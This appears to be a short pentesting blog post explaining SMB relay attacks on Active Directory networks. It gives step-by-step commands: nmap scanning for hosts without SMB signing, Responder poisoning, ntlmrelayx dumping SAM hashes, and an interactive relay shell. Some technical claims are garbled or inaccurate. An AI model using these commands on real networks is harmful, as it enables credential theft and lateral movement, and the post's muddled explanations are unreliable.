Smb relay attack
posted on 14 Jul 2022 under category Active-Directory in series Active_Directory
A SMB relay attack is where an attacker captures a users NTLM hash and relays its to another machine on the network. Masquerading as the user and authenticating against SMB to gain shell or file access
The SMB Relay attack abuses the NTLM challenge-response protocol. Commonly, all SMB sessions used the NTML protocol for encryption and authentication purposes (i.e. NTLM over SMB) . However, most sysadmins switched to KILE over SMB after research proved that the first version of NTLM is susceptible to Man-in-the-Middle attacks, the SMB Relay attack counting among them.
Now, in normal client-server communication, there are a series of requests followed by responses. The idea behind an SMB Relay attack is to position yourself between the client and the server in order to capture the data packets transmitted between the two entities.
sudo nmap -p445,139 --script=smb2-security-mode.nse -T4 192.168.1.0/24
**add ip of disable smb to target.txt
Run responder
sudo responder -I eth0 -rdw -v
Responder should now look like this:
sudo ntlmrelayx.py -tf target.txt -smb2support
Request a share that does not exist using an admin account. Notice how the script checks if Remote Registry is enabled and if not, enables it, dumps the SAM and then re-disables it.
We can then takes these hashes and crack them or we can even attempt a pass-the-hash attack and attempt to gain a shell with the NTLMv2 hash on a different machine on the network.
sudo ntlmrelayx.py -tf target.txt -smb2support -i
nc 127.0.0.1 11001
-> help
SMB relay attacks don’t have the same potency as ransomware such as Ryuk or RobbinHood, but they can provide the necessary ‘backdoor’ to those two and others. As always, play it safe, keep your apps and software up-to-date, and employ great cybersecurity.